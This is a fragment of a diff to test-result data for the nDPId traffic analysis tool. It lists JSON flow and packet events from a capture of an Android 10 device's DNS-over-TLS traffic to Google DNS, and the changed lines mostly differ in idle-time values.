-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1592552871852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552871852,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA0V5sAAHYGHtYICAQEwKgBnwNVu2A7uJADhSLfzIARAX\/+2gAAAQEICuSDFST\/\/78G"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1592552871941,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAAoAABAAEAGbH3AqAGfCAgEBLtgA1WFIt\/MAAAAAFAEAAC96AAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552878549,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552878549,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1592552878549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878549,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8PO5AAEAGL3vAqAGfCAgEBLviA1WhETzJAAAAAKAC\/\/\/ccgAAAgQFtAQCCAoAAAAnAAAAAAEDAwg="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1592552878562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552878562,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8nAYAAHYG2mIICAQEwKgBnwNVu+J3bBxFoRE8yqAS6yB6VAAAAgQFZAQCCAo7E6h3AAAAJwEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1592552878563,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552878563,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0PO9AAEAGL4LAqAGfCAgEBLviA1WhETzKd2wcRoAQAVeSlgAAAQEICgAAACw7E6h3"} 
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552878549,"flow_last_seen":1592552878564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1592552878564,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552878549,"flow_last_seen":1592552878577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1592552878577,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"b734f75d22aaff9866fbd5d27eef9106","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1592552827426,"flow_last_seen":1592552828415,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1592553007078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592553007078,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0FgtAAEAGVmbAqAGfCAgEBLxSA1VGZWusr3aVwIAQAVeQUgAAAQEICgAAfa1\/c2Kv"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592553007037,"flow_last_seen":1592553007088,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592553007088,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":297,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552824409,"flow_last_seen":1592552826208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"8.8.8.8","dst_ip":"192.168.1.159","src_port":853,"dst_port":55856,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":277,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1592552825913,"flow_last_seen":1592552826030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3843,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1592552955542,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"DoH_DoT.Google","breed":"Acceptable","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1592552871852,"flow_last_seen":1592552871941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1592552826036,"flow_last_seen":1592552867048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21215,"flow_avg_l4_payload_len":203,"midstream":0,"thread_ts_msec":1592552996502,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592553007037,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592553007037,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1592553007037,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007037,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA8FgpAAEAGVl\/AqAGfCAgEBLxSA1VGZWurAAAAAKAC\/\/+KUgAAAgQFtAQCCAoAAH2hAAAAAAEDAwg="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1592553007051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592553007051,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8ScwAAHYGLJ0ICAQEwKgBnwNVvFKvdpW\/RmVrrKAS6yB4FwAAAgQFZAQCCAp\/c2KvAAB9oQEDAwg="} 
